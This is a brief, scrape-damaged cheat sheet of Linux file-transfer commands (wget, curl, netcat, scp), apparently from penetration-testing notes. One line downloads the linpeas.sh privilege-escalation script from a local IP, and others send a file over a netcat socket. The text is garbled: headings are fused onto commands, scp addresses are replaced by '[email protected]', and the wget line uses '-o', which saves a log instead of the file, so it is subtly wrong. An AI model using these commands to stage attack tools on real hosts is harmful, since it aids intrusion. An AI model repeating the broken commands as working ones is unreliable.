Linux
Wget
wget http://192.168.1.5/linpeas.sh -o linpeas.shcURL
curl http://192.168.1.5/hello.txt -o hello.txtNetcat
nc -lvp 1234 < test.txtnc -nv 127.0.0.1 1234 > test.txtSCP
scp file.txt [email protected]:/remote/directoryscp [email protected]:/remote/file.txt /local/directoryLast updated